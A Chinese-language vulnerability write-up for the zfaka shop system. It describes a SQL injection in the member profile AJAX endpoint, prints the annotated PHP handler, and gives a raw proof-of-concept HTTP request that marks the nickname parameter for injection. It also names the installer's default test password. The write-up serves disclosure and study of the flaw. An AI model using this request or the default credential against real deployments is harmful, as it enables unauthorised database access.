zfaka
在安装的时候会新建一个测试帐号(邮箱地址在页面抓取时被遮蔽,显示为 [email protected]),密码123456。下文的接口需要登录后才能访问;部署后应删除该测试帐号或修改其密码。


在文件 application/modules/Member/controllers/Profiles.php 的 profilesajaxAction 方法第53行附近存在注入:nickname、qq、tag 三个 POST 参数中,nickname 和 qq 只经过 trimall,tag 未做任何处理,随后直接传入 UpdateByID。
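/**
 * AJAX endpoint that updates the logged-in member's profile fields.
 *
 * Reads nickname, qq, tag and csrf_token from the POST body, verifies the CSRF
 * token, passes nickname and qq through \Safe\MyString::trimall(), and writes
 * nickname, qq and tag for $this->userid via $this->m_user->UpdateByID().
 * Every outcome is reported through Helper::response() as a code/msg array:
 * 1 on success, 1000 for "not logged in" or missing parameters, 1001 when the
 * CSRF token is rejected.
 *
 * Security: all three stored values are attacker-controlled. trimall() is the
 * only processing visible here (presumably whitespace stripping, not escaping;
 * confirm in \Safe\MyString) and tag receives none, so the safety of the
 * UPDATE rests entirely on the model.
 * NOTE(review): UpdateByID() is defined outside this method; confirm it binds
 * values as query parameters instead of concatenating them into the statement.
 */
public function profilesajaxAction()
{
    // NOTE(review): with AND the request is refused only when BOTH checks fail;
    // confirm login and userid can never disagree, otherwise this should be OR.
    if ($this->login==FALSE AND !$this->userid) {
        Helper::response(array('code' => 1000, 'msg' => '请登录'));
        // Do not depend on Helper::response() ending the request: without this
        // return an unauthenticated caller would fall through to the update.
        return;
    }

    $nickname = $this->getPost('nickname', false);
    $qq = $this->getPost('qq', false);
    $tag = $this->getPost('tag', false);
    $csrf_token = $this->getPost('csrf_token', false);

    // Only scalar form values are expected. An array-valued parameter would
    // reach MyString and the query builder in a shape neither was written for,
    // so it is treated the same as a missing parameter.
    foreach (array($nickname, $qq, $tag, $csrf_token) as $value) {
        if (is_array($value)) {
            Helper::response(array('code' => 1000, 'msg' => '丢失参数'));
            return;
        }
    }

    $data = array();
    if ($nickname AND $csrf_token) {
        if ($this->VerifyCsrfToken($csrf_token)) {
            $nickname_string = new \Safe\MyString($nickname);
            $nickname = $nickname_string->trimall()->getValue();
            $qq_string = new \Safe\MyString($qq);
            $qq = $qq_string->trimall()->getValue();

            // tag is stored exactly as received; see the security note above.
            $this->m_user->UpdateByID(
                array('nickname' => $nickname, 'qq' => $qq, 'tag' => $tag),
                $this->userid
            );
            $data = array('code' => 1, 'msg' => '更新成功');
        } else {
            $data = array('code' => 1001, 'msg' => '页面超时,请刷新页面后重试!');
        }
    } else {
        $data = array('code' => 1000, 'msg' => '丢失参数');
    }
    Helper::response($data);
}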
|
数据包
POST /member/profiles/profilesajax HTTP/1.1 Host: 10.100.100.139:84 Content-Length: 395 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://10.100.100.139:84 Referer: http://10.100.100.139:84/member/profiles Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=v8cune5mggdgu7dp036q722c0q Connection: close
nickname=666777*&qq=43036456&tag=%E8%B5%84%E6%96%99%E7%A9%BA%E7%99%BD%E6%98%AF%E5%A4%A7%E5%B8%85%E9%94%85&csrf_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC96bGtiLm5ldCIsImF1ZCI6IlJQQyIsImV4cCI6MTYzMDM3OTU5NX0.EyrvVuN4mcHL_h8YXcKoq9XJ0H_cmcD5YainH2XPsCcMMdFZYAfPZxqzSc1ohkbiYxXeVcuGa0Rq_Ea0gyW_1qQuF0pVrjeOz4bRSTr6fI-dHn_wp4k4EKTgCAPpaVmqBgzAdmpyKuar_jlX-04vPfV1SPKe2hqojRjO9LGxBfw
|

需要注意的是 csrf_token 会过期(请求中的 token 是带 exp 字段的 JWT)。